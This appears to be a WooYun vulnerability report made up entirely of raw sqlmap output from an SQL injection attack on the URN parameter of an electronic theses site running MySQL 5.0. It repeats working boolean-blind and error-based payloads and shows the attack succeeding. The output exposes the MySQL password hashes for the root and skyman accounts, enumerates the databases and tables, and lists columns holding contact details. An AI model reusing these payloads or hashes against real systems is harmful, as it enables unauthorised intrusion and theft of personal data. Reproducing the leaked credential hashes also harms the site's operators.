WooYun.org

---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [2]:
[*] 'root'@'localhost'
[*] 'skyman'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: 634257d56a847967
[*] skyman [1]:
    password hash: 36ead6da63c566ef
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
available databases [8]:
[*] etd_available
[*] etd_global
[*] etd_qnaire
[*] etd_submitted
[*] information_schema
[*] mysql
[*] test
[*] tmp
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
Database: etd_available
[7 tables]
+---------------------+
| advisor_by_urn      |
| etd_db_availability |
| etd_main            |
| filename_by_urn     |
| keyword_by_urn      |
| keyword_c_by_urn    |
| oai_record          |
+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
Database: etd_available
Table: etd_db_availability
[7 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| DB_address      | varchar(100) |
| DB_availability | varchar(30)  |
| DB_email        | varchar(100) |
| DB_grant_choice | varchar(30)  |
| DB_opendate     | date         |
| DB_phone        | varchar(20)  |
| urn             | varchar(30)  |
+-----------------+--------------+